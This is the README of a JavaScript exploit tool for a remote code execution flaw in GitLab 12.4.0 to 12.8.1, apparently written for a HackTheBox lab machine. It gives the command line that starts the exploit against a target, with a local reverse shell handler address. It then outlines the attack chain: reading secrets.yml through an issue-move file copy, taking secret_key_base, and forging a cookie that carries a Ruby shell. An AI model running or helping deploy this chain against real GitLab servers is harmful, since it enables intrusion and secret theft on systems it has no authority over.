GitLab v12.4.0-12.8.1 RCE

Based entirely on https://github.com/dotPY-hax/gitlab_RCE, which did not work for me and the HTML parsing stuff seemed cumbersome so I rewrote it in js.

Usage

Start a reverse shell handler in the usual way, then run this script with:

TARGET_URI="https://target" TARGET_EMAIL_DOMAIN="laboratory.htb" \
 TARGET_USER="test" TARGET_PASSWORD="Test pass 123" \
 LOCAL_IP="10.10.14.142" LOCAL_PORT="44044" \
 node gitlab_rce.js

A proxy may be specified with TUNNEL_HOST="127.0.0.1" TUNNEL_PORT="8080". Burp is particularly useful for debugging with this.

What this does

1. checks if target is up
2. if the provided user exists, skip to 5
3. scan for a username that doesn't already exist
4. create that user
5. attempt sign in
6. create two empty projects
7. create an new issue ticket with a malicious link in it's body in the first project
8. move the new ticket to the other project, causing GitLab to rewrite our malicious link and copy the file it points to into the uploads dir
9. fetches the target file, in this case we want the secrets.yml for the secret_key_base
10. use secret_key_base to mint an evil cookie with our Ruby shell and pass it to GitLab